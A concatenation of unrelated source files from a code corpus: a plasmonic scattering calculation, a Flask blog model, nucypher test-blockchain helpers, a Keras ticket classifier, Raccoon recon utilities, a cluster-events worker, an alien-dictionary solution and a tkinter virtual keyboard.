* (-2.) * epD * (epD+epM) * R1_x0**(2*n)
d_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* 2. * epD * (epD-epM)
Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_sca_hori(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power scattered by the non-concentric
annulus. This is equivalent to the power absorbed by a
fictive absorver in the concentric annulus frame.
Output: Power scattered by non-concentric annulus
as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (1j*omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
#Calculate scattering coefficient including radiative losses
b_n = b_n_2 * (a_n_r + a_n_s)
E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
def Pow_sca_r(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power scattered by the non-concentric
annulus. This is equivalent to the power absorbed by a
fictive absorver in the concentric annulus frame.
Output: Power scattered by non-concentric annulus
as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
#Calculate scattering coefficient including radiative losses
b_n = b_n_2 * (a_n_r + a_n_s)
E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
if __name__ == "__main__":
print 'Supposed to be called as a function, not main module'
| StarcoderdataPython |
5179522 | <reponame>DubstepWar/flask-blog-test<gh_stars>0
from app_blog.extensions import db, ma
import datetime as dt
class Category(db.Model):
__tablename__ = "categories"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String, nullable=False, unique=True)
created_at = db.Column(db.DateTime, default=dt.datetime.utcnow)
updated_at = db.Column(
db.DateTime, default=dt.datetime.utcnow, onupdate=dt.datetime.utcnow
)
def __str__(self):
return self.name
def __repr__(self):
return f"<Category id={self.id} name={self.name}>"
class CategorySchema(ma.SQLAlchemyAutoSchema):
model = Category
# include_fk = True хз что это
category_schema = CategorySchema()
categories_schema = CategorySchema(many=True)
| StarcoderdataPython |
176045 | """
This file is part of nucypher.
nucypher is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
nucypher is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with nucypher. If not, see <https://www.gnu.org/licenses/>.
"""
from twisted.logger import Logger
from constant_sorrow.constants import NO_BLOCKCHAIN_AVAILABLE
from typing import List
from umbral.keys import UmbralPrivateKey
from web3.middleware import geth_poa_middleware
from nucypher.blockchain.eth import constants
from nucypher.blockchain.eth.chains import Blockchain
from nucypher.utilities.sandbox.constants import (DEVELOPMENT_ETH_AIRDROP_AMOUNT,
DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK,
TEST_URSULA_INSECURE_DEVELOPMENT_PASSWORD)
def token_airdrop(token_agent, amount: int, origin: str, addresses: List[str]):
"""Airdrops tokens from creator address to all other addresses!"""
def txs():
for address in addresses:
txhash = token_agent.contract.functions.transfer(address, amount).transact({'from': origin})
yield txhash
receipts = list()
for tx in txs(): # One at a time
receipt = token_agent.blockchain.wait_for_receipt(tx)
receipts.append(receipt)
return receipts
class TesterBlockchain(Blockchain):
"""
Blockchain subclass with additional test utility methods and options.
"""
_instance = NO_BLOCKCHAIN_AVAILABLE
_test_account_cache = list()
def __init__(self, test_accounts=None, poa=True, airdrop=True, *args, **kwargs):
super().__init__(*args, **kwargs)
self.log = Logger("test-blockchain") # type: Logger
# For use with Proof-Of-Authority test-blockchains
if poa is True:
w3 = self.interface.w3
w3.middleware_stack.inject(geth_poa_middleware, layer=0)
# Generate additional ethereum accounts for testing
enough_accounts = len(self.interface.w3.eth.accounts) >= DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK
if test_accounts is not None and not enough_accounts:
accounts_to_make = DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK - len(self.interface.w3.eth.accounts)
test_accounts = test_accounts if test_accounts is not None else DEFAULT_NUMBER_OF_URSULAS_IN_DEVELOPMENT_NETWORK
self.__generate_insecure_unlocked_accounts(quantity=accounts_to_make)
assert test_accounts == len(self.interface.w3.eth.accounts)
if airdrop is True: # ETH for everyone!
self.ether_airdrop(amount=DEVELOPMENT_ETH_AIRDROP_AMOUNT)
@classmethod
def sever_connection(cls) -> None:
cls._instance = NO_BLOCKCHAIN_AVAILABLE
def __generate_insecure_unlocked_accounts(self, quantity: int) -> List[str]:
"""
Generate additional unlocked accounts transferring a balance to each account on creation.
"""
addresses = list()
insecure_passphrase = <PASSWORD>
for _ in range(quantity):
umbral_priv_key = UmbralPrivateKey.gen_key()
address = self.interface.w3.personal.importRawKey(private_key=umbral_priv_key.to_bytes(),
passphrase=insecure_passphrase)
assert self.interface.unlock_account(address, password=<PASSWORD>, duration=None), 'Failed to unlock {}'.format(address)
addresses.append(address)
self._test_account_cache.append(address)
self.log.info('Generated new insecure account {}'.format(address))
return addresses
def ether_airdrop(self, amount: int) -> List[str]:
"""Airdrops ether from creator address to all other addresses!"""
coinbase, *addresses = self.interface.w3.eth.accounts
tx_hashes = list()
for address in addresses:
tx = {'to': address, 'from': coinbase, 'value': amount}
txhash = self.interface.w3.eth.sendTransaction(tx)
_receipt = self.wait_for_receipt(txhash)
tx_hashes.append(txhash)
self.log.info("Airdropped {} ETH {} -> {}".format(amount, tx['from'], tx['to']))
return tx_hashes
def time_travel(self, hours: int=None, seconds: int=None, periods: int=None):
"""
Wait the specified number of wait_hours by comparing
block timestamps and mines a single block.
"""
more_than_one_arg = sum(map(bool, (hours, seconds, periods))) > 1
if more_than_one_arg:
raise ValueError("Specify hours, seconds, or lock_periods, not a combination")
if periods:
duration = (constants.HOURS_PER_PERIOD * periods) * (60*60)
base = constants.HOURS_PER_PERIOD * 60 * 60
elif hours:
duration = hours * (60*60)
base = 60 * 60
elif seconds:
duration = seconds
base = 1
else:
raise ValueError("Specify either hours, seconds, or lock_periods.")
now = self.interface.w3.eth.getBlock(block_identifier='latest').timestamp
end_timestamp = ((now+duration)//base) * base
self.interface.w3.eth.web3.testing.timeTravel(timestamp=end_timestamp)
self.interface.w3.eth.web3.testing.mine(1)
self.log.info("Time traveled to {}".format(end_timestamp))
| StarcoderdataPython |
1662723 | import os
import pandas as pd
import tensorflow as tf
from tensorflow.keras.preprocessing import sequence,text
from tensorflow.keras import models
from tensorflow.keras.layers import Dense, Dropout, Embedding, Conv1D, MaxPooling1D, GlobalAveragePooling1D
import numpy as np
data_set = pd.read_csv('Dataset.csv', header = None)
data_set.columns = ['Text', 'Category']
train_set = data_set.sample(frac=0.8)
data_set.drop(train_set.index,axis=0,inplace=True)
valid_set = data_set.sample(frac=0.5)
data_set.drop(valid_set.index,axis=0,inplace=True)
test_set = data_set
CLASSES= {'CPU_Utilization':0,'Password_Reset':1,'Memory_Utilization':2}
top_tokens=2<PASSWORD>0
max_len=50
filters=64
dropout_rate=0.2
embedding_dimension=200
kernel_size=3
pool_size=3
def data_map(df):
return list(df['Text']),np.array(df['Category'].map(CLASSES))
train_text,train_labels = data_map(train_set)
valid_text,valid_labels=data_map(valid_set)
test_text,test_labels=data_map(test_set)
def embedding_matrix_conv(word_index, embedding_file_path, embedding_dimension):
embedding_matrix_comb = {}
with open(embedding_file_path,'r') as embed_file:
for token_entry in embed_file:
values = token_entry.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embedding_matrix_comb[word] = coefs
num_words = min(len(word_index) + 1, top_tokens)
embedding_matrix = np.zeros((num_words, embedding_dimension))
for word, word_position in word_index.items():
if word_position >= top_tokens:
continue
embedding_vector = embedding_matrix_comb.get(word)
if embedding_vector is not None:
embedding_matrix[word_position] = embedding_vector
return embedding_matrix
tokenizer=text.Tokenizer (num_words=top_tokens)
tokenizer.fit_on_texts(train_text)
word_index=tokenizer.word_index
embedding_file_path = 'glove.6B.200d.txt'
def create_model():
model = models.Sequential()
features = min(len(word_index) + 1, top_tokens)
model.add(Embedding(input_dim=features,
output_dim=embedding_dimension,
input_length=max_len,
weights=[embedding_matrix_conv(word_index,
embedding_file_path, embedding_dimension)],trainable=True))
model.add(Dropout(rate=dropout_rate))
model.add(Conv1D(filters=filters,
kernel_size=kernel_size,
activation='relu',
bias_initializer='he_normal',
padding='same'))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(Conv1D(filters=filters * 2,
kernel_size=kernel_size,
activation='relu',
bias_initializer='he_normal',
padding='same'))
model.add(GlobalAveragePooling1D())
model.add(Dropout(rate=dropout_rate))
model.add(Dense(len(CLASSES), activation='softmax'))
optimizer = tf.keras.optimizers.Adam(lr=0.001)
model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['acc'])
return model
train_process = tokenizer.texts_to_sequences(train_text)
train_process = sequence.pad_sequences(train_process, maxlen=max_len)
valid_process = tokenizer.texts_to_sequences(valid_text)
valid_process = sequence.pad_sequences(valid_process, maxlen=max_len)
test_process = tokenizer.texts_to_sequences(test_text)
test_process = sequence.pad_sequences(test_process, maxlen=max_len)
model = create_model()
model.summary()
checkpoint_path = "training_path/cp.ckpt"
checkpoint_directory = os.path.dirname(checkpoint_path)
callback_path = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path, save_weights_only=True, verbose=1)
model.fit(train_process,
train_labels,
epochs=10,
validation_data=(test_process,test_labels),
callbacks=[callback_path])
model.save('model_saved/model')
input_dict={'embedding_9_input': valid_process[1:2]}
with open('sample_instance.json', 'w') as prediction_file:
json.dump(input_dict, prediction_file)
def predictClass():
try:
content= ['User requested to Change Password as expired']
result = {}
pred_process = tokenizer.texts_to_sequences(content)
pred_process = sequence.pad_sequences(pred_process, maxlen=max_len)
new_model = tf.keras.models.load_model('model_saved/model')
prediction = int(new_model.predict_classes(pred_process))
for key, value in CLASSES.items():
if value==prediction:
category=key
result["class"] = category
result = {"results": result}
result = json.dumps(result)
return result
except Exception as e:
return e
if __name__=='__main__':
predictClass()
| StarcoderdataPython |
3538619 | <reponame>joranbeasley/Raccoon
import os
import distutils.spawn
from collections import Counter
from subprocess import PIPE, check_call, CalledProcessError
from requests.exceptions import ConnectionError
from raccoon_src.utils.exceptions import RaccoonException, ScannerException, RequestHandlerException
from raccoon_src.utils.request_handler import RequestHandler
class HelpUtilities:
PATH = ""
@classmethod
def validate_target_is_up(cls, host):
cmd = "ping -c 1 {}".format(host.target)
try:
check_call(cmd.split(), stdout=PIPE, stderr=PIPE)
return
except CalledProcessError:
# Maybe ICMP is blocked. Try web server
try:
if host.port == 443 or host.port == 80:
url = "{}://{}".format(host.protocol, host.target)
else:
url = "{}://{}:{}".format(host.protocol, host.target, host.port)
rh = RequestHandler()
rh.send("GET", url=url, timeout=15)
return
except (ConnectionError, RequestHandlerException):
raise RaccoonException("Target {} seems to be down (no response to ping or from a web server"
" at port {}).\nRun with --skip-health-check to ignore hosts"
" considered as down.".format(host, host.port))
@classmethod
def validate_wordlist_args(cls, proxy_list, wordlist, subdomain_list):
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
if wordlist and not os.path.isfile(wordlist):
raise FileNotFoundError("Not a valid file path, {}".format(wordlist))
if subdomain_list and not os.path.isfile(subdomain_list):
raise FileNotFoundError("Not a valid file path, {}".format(wordlist))
@classmethod
def validate_port_range(cls, port_range):
"""Validate port range for Nmap scan"""
ports = port_range.split("-")
if all(ports) and int(ports[-1]) <= 65535 and not len(ports) != 2:
return True
raise ScannerException("Invalid port range {}".format(port_range))
@classmethod
def validate_proxy_args(cls, *args):
"""No more than 1 of the following can be specified: tor_routing, proxy, proxy_list"""
supplied_proxies = Counter((not arg for arg in (*args,))).get(False)
if not supplied_proxies:
return
elif supplied_proxies > 1:
raise RaccoonException("Must specify only one of the following:\n"
"--tor-routing, --proxy-list, --proxy")
@classmethod
def determine_verbosity(cls, quiet):
if quiet:
return "CRITICAL"
else:
return "INFO"
@classmethod
def find_nmap_executable(cls):
return distutils.spawn.find_executable("nmap")
@classmethod
def find_openssl_executable(cls):
return distutils.spawn.find_executable("openssl")
@classmethod
def validate_executables(cls):
if not (cls.find_nmap_executable() and cls.find_openssl_executable()):
raise RaccoonException("Could not find Nmap or OpenSSL "
"installed. Please install them and run Raccoon again.")
return
@classmethod
def create_output_directory(cls, outdir):
"""Tries to create base output directory"""
cls.PATH = outdir
try:
os.mkdir(outdir)
except FileExistsError:
pass
@classmethod
def get_output_path(cls, module_path):
return "{}/{}".format(cls.PATH, module_path)
@classmethod
def confirm_traffic_routs_through_tor(cls):
rh = RequestHandler()
try:
page = rh.send("GET", url="https://check.torproject.org")
if "Congratulations. This browser is configured to use Tor." in page.text:
return
elif "Sorry. You are not using Tor" in page.text:
raise RaccoonException("Traffic does not seem to be routed through Tor.\nExiting")
except RequestHandlerException:
raise RaccoonException("Tor service seems to be down - not able to connect to 127.0.0.1:9050.\nExiting")
@classmethod
def query_dns_dumpster(cls, host):
# Start DNS Dumpster session for the token
request_handler = RequestHandler()
dnsdumpster_session = request_handler.get_new_session()
url = "https://dnsdumpster.com"
if host.naked:
target = host.naked
else:
target = host.target
payload = {
"targetip": target,
"csrfmiddlewaretoken": None
}
try:
dnsdumpster_session.get(url, timeout=10)
jar = dnsdumpster_session.cookies
for c in jar:
if not c.__dict__.get("name") == "csrftoken":
continue
payload["csrfmiddlewaretoken"] = c.__dict__.get("value")
break
return dnsdumpster_session.post(url, data=payload, headers={"Referer": "https://dnsdumpster.com/"})
except ConnectionError:
raise RaccoonException
@classmethod
def extract_hosts_from_cidr(cls):
pass
@classmethod
def extract_hosts_from_range(cls):
pass
| StarcoderdataPython |
6502305 | <gh_stars>0
from dataclasses import dataclass
from typing import List
import queue
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from utils import ErrorCounter, Changes, log, get_event_id, get_dict_hash
from storage import ClusterEventsStorage, ElasticsearchStorage
from events_scrape import InventoryClient
from sentry_sdk import capture_exception
from config import SentryConfig, EventStoreConfig
from assisted_service_client.rest import ApiException
EVENT_CATEGORIES = ["user", "metrics"]
@dataclass
class ClusterEventsWorkerConfig:
max_workers: int
sentry: SentryConfig
error_counter: ErrorCounter
changes: Changes
events: EventStoreConfig
class ClusterEventsWorker:
def __init__(self, config: ClusterEventsWorkerConfig, ai_client: InventoryClient,
cluster_events_storage: ClusterEventsStorage, es_store: ElasticsearchStorage):
self._es_store = es_store
self._ai_client = ai_client
self.cluster_events_storage = cluster_events_storage
self._config = config
self._executor = None
self._es_store = es_store
def process_clusters(self, clusters: List[dict]) -> None:
with ThreadPoolExecutor(max_workers=self._config.max_workers) as self._executor:
cluster_count = len(clusters)
for cluster in clusters:
self._executor.submit(self.store_events_for_cluster, cluster)
log.info(f"Sent {cluster_count} clusters for processing...")
def store_events_for_cluster(self, cluster: dict) -> None:
try:
log.debug(f"Storing cluster: {cluster}")
if "hosts" not in cluster or len(cluster["hosts"]) == 0:
cluster["hosts"] = self.__get_hosts(cluster["id"])
events = self.__get_events(cluster["id"])
component_versions = self._ai_client.get_versions()
self._store_normalized_events(component_versions, cluster, events)
self.cluster_events_storage.store(component_versions, cluster, events)
self._config.changes.set_changed()
log.debug(f'Storing events for cluster {cluster["id"]}')
except Exception as e:
self.__handle_unexpected_error(e, f'Error while processing cluster {cluster["id"]}')
def __get_events(self, cluster_id: str):
events = []
try:
events = self._ai_client.get_events(cluster_id, categories=EVENT_CATEGORIES)
except ApiException as e:
if e.status != 404:
raise e
log.debug(f'Events for cluster {cluster_id} not found')
return events
def __get_hosts(self, cluster_id: str):
hosts = []
try:
hosts = self._ai_client.get_cluster_hosts(cluster_id=cluster_id)
except ApiException as e:
if e.status != 404:
raise e
# If a cluster is not found, then we consider to have 0 hosts. It was probably deleted
log.debug(f'Cluster {cluster_id} not found while retrieving hosts')
return hosts
def __handle_unexpected_error(self, e: Exception, msg: str):
self._config.error_counter.inc()
if self._config.sentry.enabled:
capture_exception(e)
log.exception(msg)
def shutdown(self):
"""
This is needed for python 3.8 and lower. With python 3.9 we can pass a parameter:
self._executor.shutdown(wait=False, cancel_futures=True)
"""
if self._executor:
# Do not accept further tasks
self._executor.shutdown(wait=False)
self._drain_queue()
def _drain_queue(self):
while True:
try:
work_item = self._executor._work_queue.get_nowait() # pylint: disable=protected-access
except queue.Empty:
break
if work_item:
work_item.future.cancel()
def _store_normalized_events(self, component_versions, cluster, event_list):
try:
cluster_id_filter = {
"term": {
"cluster_id": cluster["id"]
}
}
self._es_store.store_changes(
index=EventStoreConfig.COMPONENT_VERSIONS_EVENTS_INDEX,
documents=[component_versions],
id_fn=get_dict_hash,
enrich_document_fn=add_timestamp
)
self._es_store.store_changes(
index=EventStoreConfig.CLUSTER_EVENTS_INDEX,
documents=[cluster],
id_fn=get_dict_hash,
filter_by=cluster_id_filter)
self._es_store.store_changes(
index=EventStoreConfig.EVENTS_INDEX,
documents=event_list,
id_fn=get_event_id,
filter_by=cluster_id_filter)
except Exception as e:
self.__handle_unexpected_error(e, f'Error while storing normalized events for cluster {cluster["id"]}')
def add_timestamp(doc: dict) -> dict:
doc["timestamp"] = datetime.utcnow().isoformat()
return doc
| StarcoderdataPython |
8071535 | <filename>tests/unit/test_lazy.py<gh_stars>1-10
# import pytest
class Testcached_property:
def test___set_name__(self): # synced
assert True
def test___get__(self): # synced
assert True
| StarcoderdataPython |
9731077 | <reponame>MaksHess/napari<filename>napari/_tests/test_sys_info.py
from napari.utils.info import sys_info
# vispy use_app tries to start Qt, which can cause segfaults when running
# sys_info on CI unless we provide a pytest Qt app
def test_sys_info(qapp):
str_info = sys_info()
assert isinstance(str_info, str)
assert '<br>' not in str_info
assert '<b>' not in str_info
assert "Plugins" in str_info
html_info = sys_info(as_html=True)
assert isinstance(html_info, str)
assert '<br>' in html_info
assert '<b>' in html_info
| StarcoderdataPython |
6562887 | <gh_stars>0
import scipy
import matplotlib.pyplot as plt
import scipy.io.wavfile
sample_rate, X = scipy.io.wavfile.read('signal_noise.wav')
print (sample_rate, X.shape )
plt.specgram(X, Fs=sample_rate)
plt.show()
sample_rate, X = scipy.io.wavfile.read('noise.wav')
print (sample_rate, X.shape )
plt.specgram(X, Fs=sample_rate)
plt.show()
sample_rate, X = scipy.io.wavfile.read('output_signal_lms.wav')
print (sample_rate, X.shape )
plt.specgram(X, Fs=sample_rate)
plt.show() | StarcoderdataPython |
3255768 | import glob
import argparse
import math
import random
import os
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', type=str, default='/eva_data/zchin/cityscapes/all_train',
help='trainig image saving directory')
parser.add_argument('--ratio', type=float, default=0.2, help='validation data ratio')
args = parser.parse_args()
if __name__ == '__main__':
train_dir=args.data_root.replace('all_train','train')
val_dir=args.data_root.replace('all_train','val')
if not os.path.isdir(train_dir):
os.mkdir(train_dir)
os.mkdir(val_dir)
data_size = len(os.listdir(args.data_root))
print(f'data size: {data_size}')
valid_size = math.floor(data_size * args.ratio)
img_list = [img_path for img_path in glob.glob(args.data_root+'/*')]
idx = random.sample(range(data_size), valid_size)
for i,src_img_path in enumerate(img_list):
img_name=src_img_path.split('/')[-1]
if i in idx:
dest_img_path=os.path.join(val_dir,img_name)
else:
dest_img_path=os.path.join(train_dir,img_name)
shutil.copyfile(src_img_path,dest_img_path)
train_size = len(glob.glob1(train_dir, "*.jpg"))
valid_size = len(glob.glob1(val_dir, "*.jpg"))
print(f'train size: {train_size}\tvalid size: {valid_size}') | StarcoderdataPython |
11222968 | from src.masonite.providers import StatusCodeProvider
from src.masonite.request import Request
from src.masonite.response import Response
from src.masonite.view import View
from src.masonite.app import App
from src.masonite.providers.StatusCodeProvider import ServerErrorExceptionHook
from src.masonite.testing import generate_wsgi
import unittest
class TestStatusCode(unittest.TestCase):
def setUp(self):
self.app = App()
self.app.bind('StatusCode', '404 Not Found')
self.app.bind('Request', Request(None).load_app(self.app).load_environ(generate_wsgi()))
self.app.simple(Response(self.app))
self.app.bind('ViewClass', View(self.app))
self.app.bind('View', self.app.make('ViewClass').render)
def test_provider_returns_none_on_200_OK(self):
self.assertIsNone(StatusCodeProvider().load_app(self.app).boot())
class MockApplicationConfig:
DEBUG = 'True'
class TestServerErrorExceptionHook(unittest.TestCase):
def setUp(self):
self.app = App()
self.app.bind('Container', self.app)
self.app.bind('Request', Request(None).load_app(self.app).load_environ(generate_wsgi()))
self.app.simple(Response)
self.app.bind('Application', MockApplicationConfig)
self.app.bind('ViewClass', View(self.app))
self.app.bind('View', self.app.make('ViewClass').render)
def test_response_is_set_when_app_debug_is_true(self):
self.assertIsNone(ServerErrorExceptionHook().load(self.app))
def test_no_response_set_when_app_debug_is_false(self):
application = MockApplicationConfig
application.DEBUG = False
self.app.bind('Application', application)
self.assertIsNone(ServerErrorExceptionHook().load(self.app))
| StarcoderdataPython |
3311013 | <filename>facebook/alienDict.py
from collections import defaultdict
class Solution(object):
def alienOrder(self, words):
map = {}
letters = [0 for i in range(26)]
for i in range(len(words)):
for j in range(len(words[i])):
key=ord(words[i][j])-ord('a')
letters[key]=0
map[key]=set()
for i in range(len(words)-1):
word1 = words[i]
word2 = words[i+1]
idx = 0
for j in range(min(len(word1),len(word2))):
if(word1[j]!=word2[j]):
key1 = ord(word1[j])-ord('a')
key2 = ord(word2[j])-ord('a')
count = letters[key2]
if(key2 not in map[key1]):
letters[key2] =count+1
map[key1].add(key2)
break
dictionary = collections.deque()
res = ''
for i in range(26):
if(letters[i]==0 and i in map):
dictionary.appendleft(i)
while(len(dictionary)!=0):
nextup = dictionary.pop()
res+=(chr(nextup+ord('a')))
greaterSet = map[nextup]
for greater in greaterSet:
letters[greater]-=1
if(letters[greater]==0):
dictionary.appendleft(greater)
if(len(map)!=len(res)):
return ""
return res
def alienOrder1(self, words): # topo sort BFS
# a -> b
adj = defaultdict(set)
# in-degree
deg = {c: 0 for w in words for c in w}
for i, w1 in enumerate(words[:-1]):
w2 = words[i + 1]
for c1, c2 in zip(w1, w2):
if c1 == c2: continue
if c2 not in adj[c1]: deg[c2] += 1
adj[c1].add(c2)
break
res = ''
# start w 0 indegree nodes
q = deque([c for c in deg if not deg[c]])
while q:
c = q.popleft()
res += c
for n in adj[c]:
deg[n] -= 1
if not deg[n]: q.append(n)
return res if len(res) == len(deg) else '' | StarcoderdataPython |
282913 | <reponame>not4YU5H/hacktoberfest2021-2
from tkinter import *
from tkinter import messagebox
import tkinter.messagebox as mbox
import tkinter as tk
root = Tk()
root.title("Virtual Keyboard")
root.geometry('1000x700')
class Keypad(tk.Frame):
cells = [
['1', '2', '3', '4', '5', '6', '7', '8', '9', '0'],
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm','n', 'o', 'p', 'q','r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M','N', 'O', 'P', 'Q','R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'],
['!', '@', '#', '$', '%', '&', '*', '/', '\'', '.', ',', ';', ':', '?', '<', '>','😀','😋','😂','🌞','🌴','🍕','🏳', '♻', '✔', '👍'],
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.target = None
self.memory = ''
for y, row in enumerate(self.cells):
for x, item in enumerate(row):
b = tk.Button(self, text=item, command=lambda text=item:self.append(text),font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
b.grid(row=y, column=x, sticky='news')
x = tk.Button(self, text='Space', command=self.space,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
x.grid(row=0, column=10, columnspan='4', sticky='news')
x = tk.Button(self, text='tab', command=self.tab,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
x.grid(row=0, column=14, columnspan='3', sticky='news')
x = tk.Button(self, text='Backspace', command=self.backspace,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
x.grid(row=0, column=17,columnspan='3', sticky='news')
x = tk.Button(self, text='Clear', command=self.clear,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
x.grid(row=0, column=20, columnspan='3', sticky='news')
x = tk.Button(self, text='Hide', command=self.hide,font=("Arial", 14), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
x.grid(row=0, column=23, columnspan='3', sticky='news')
def get(self):
if self.target:
return self.target.get("1.0", "end-1c")
def append(self, text):
if self.target:
self.target.insert('end', text)
def clear(self):
if self.target:
self.target.delete('1.0', 'end')
def backspace(self):
if self.target:
text = self.get()
text = text[:-1]
self.clear()
self.append(text)
def space(self):
if self.target:
text = self.get()
text = text + " "
self.clear()
self.append(text)
def tab(self): # 5 spaces
if self.target:
text = self.get()
text = text + " "
self.clear()
self.append(text)
def copy(self):
#TODO: copy to clipboad
if self.target:
self.memory = self.get()
self.label['text'] = 'memory: ' + self.memory
print(self.memory)
def paste(self):
#TODO: copy from clipboad
if self.target:
self.append(self.memory)
def show(self, entry):
self.target = entry
self.place(relx=0.5, rely=0.5, anchor='c')
def hide(self):
self.target = None
self.place_forget()
#-------------------------------------------------------
def print_output():
mbox.showinfo("Text Entered", "Text Entered :\n\n" + text_enter.get('1.0',END))
# firstclick1 = True
# def on_text_enter_click(event):
# """function that gets called whenever entry1 is clicked"""
# global firstclick1
# if firstclick1: # if this is the first time they clicked it
# firstclick1 = False
# text_enter.delete('1.0', "end") # delete all the text in the entry
def des_f1():
f1.destroy()
f1 = Frame(root, height=700, width=1000)
f1.propagate(0)
f1.pack(side='top')
# start1 = Label(f1, text='VIRTUAL', font=("Arial", 100), fg="magenta")
# start1.place(x=250, y=100)
#
# start2 = Label(f1, text='KEYBOARD', font=("Arial", 100), fg="magenta")
# start2.place(x=150, y=300)
c = Canvas(f1, width=1000, height=700)
c.pack()
p1 = PhotoImage(file='Images/keyboard.gif')
c.create_image(200, 100, image=p1, anchor=NW)
start1 = Label(f1, text='VIRTUAL KEYBOARD', font=("Arial", 50), fg="magenta", underline = 0)
start1.place(x=150, y=10)
startb = Button(f1, text="START",command=des_f1,font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
startb.place(x = 180 , y =550 )
f2 = Frame(root, height=700, width=1000)
f2.propagate(0)
f2.pack(side='top')
keypad = Keypad(root)
start2 = Label(f2, text='ENTER TEXT HERE...', font=("Arial", 40), fg="magenta")
start2.place(x=200, y=460)
text_enter = tk.Text(f2, height=10, width=80, font=("Arial", 15), bg="light yellow", fg="brown",borderwidth=3, relief="solid")
text_enter.insert(END, 'Enter your text here from virtual keyboard...') # default line in text area, can be cleared when touched
# text_enter.bind('<FocusIn>', on_text_enter_click)
text_enter.place(x=50, y=10)
keyboardb = Button(f2, text="KEYBOARD",command=lambda:keypad.show(text_enter),font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
keyboardb.place(x =100 , y =550 )
